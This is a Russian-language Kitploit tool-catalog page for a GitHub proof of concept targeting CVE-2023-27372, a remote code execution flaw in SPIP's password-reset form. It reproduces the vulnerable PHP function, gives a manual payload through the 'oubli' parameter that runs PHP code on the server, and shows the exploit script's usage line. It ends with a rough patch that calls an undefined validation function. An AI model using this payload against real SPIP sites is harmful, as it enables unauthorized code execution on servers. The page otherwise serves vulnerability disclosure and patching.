Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-27372-PoC — Это PoC для CVE-2023-27372, который запускает полностью интерактивную оболочку. | Kitploit
Инструменты/GitHubGitHub/0spwn/cve-2023-27372-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHub0spwn/cve-2023-27372-poc

CVE-2023-27372-PoC

Это PoC для CVE-2023-27372, который запускает полностью интерактивную оболочку.

Репозиторий
63 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Этот PoC был написан быстро, в нём нет ничего особенного.

Он эксплуатирует новую уязвимость CVE-2023-27372 SPIP RCE.

Это ошибка десериализации, которая использует опасное использование тега #ENV во время функции сброса пароля (spip.php?page=spip_pass) в файле "/ecrire/balise/formulaire_.php". А именно эта строка:

  1. Синтаксис: python3 exploit.py -u http(s)://url.com
root@kitploit:~
function protege_champ($texte){

	if (is_array($texte))

		$texte = array_map('protege_champ',$texte);

	else {

		// ne pas corrompre une valeur serialize

		if (preg_match(",^[abis]:\d+[:;],", $texte) AND unserialize($texte)!=false)

			return $texte;

		$texte = entites_html($texte);

		$texte = str_replace("'","'",$texte);

	}

	return $texte;

}

Функция protege_champ страдает от различных недостатков. Проверка регулярного выражения, используемая для валидации ввода, некорректна и её легко обойти. Код вызывает функцию unserialize без надлежащей проверки, что позволяет выполнять произвольный код. Ручная эксплуатация выполняется чрезвычайно просто. Например, если мы хотим выполнить phpinfo();, мы можем сделать:

root@kitploit:~
oubli=s:19:"<?phpinfo(); ?>";

Если сервер возвращает ожидаемый результат, он уязвим. Как исправить? На самом деле довольно просто. Ниже я написал базовый патч:

root@kitploit:~
function protege_champ($texte) {

  if (is_array($texte)) {

    $texte = array_map('protege_champ', $texte);

  } else {

    if (!isValidInput($texte)) {

      $texte = 'Malicious input detected';

    } else {

      $texte = entites_html($texte);

      $texte = str_replace("'", "&#39;", $texte);

    }

  }

  return $texte;

}

Исправленная функция protege_champ включает проверку ввода, санитизацию и обработку вредоносных данных.

Пожалуйста, не используйте это для вредоносных целей. Спасибо.

<a href=https://twitter.com/0SPwn>Twitter

Скачать инструмент